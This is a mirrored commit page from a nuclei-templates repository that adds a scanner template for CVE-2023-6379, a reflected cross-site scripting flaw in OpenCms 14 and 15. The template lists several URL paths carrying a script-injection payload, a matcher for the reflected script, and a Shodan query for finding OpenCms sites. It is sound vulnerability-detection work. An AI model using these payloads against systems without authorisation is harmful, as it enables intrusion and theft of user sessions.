daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8902 from projectdiscovery/princechaddha-patch-5 

Create CVE-2023-6379.yaml
patch-1
Ritik Chaddha 2024-01-10 13:48:49 +05:30 committed by GitHub
parent ebf68ecdb9 c09b197ff0
commit 1ed1d08a4e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 61 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
http/cves/2023/CVE-2023-6379.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2023-6379
info:
name: OpenCMS 14 & 15 - Cross Site Scripting
author: msegoviag
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to version OpenCMS 16
reference:
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
- https://nvd.nist.gov/vuln/detail/CVE-2023-6379
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6379
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: alkacon
product: OpenCms
shodan-query: title:"opencms"
tags: cve,cve2023,opencms,xss,alkacon
http:
- method: GET
path:
- '{{BaseURL}}/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
- '{{BaseURL}}/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>" />'
- 'OpenCms'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200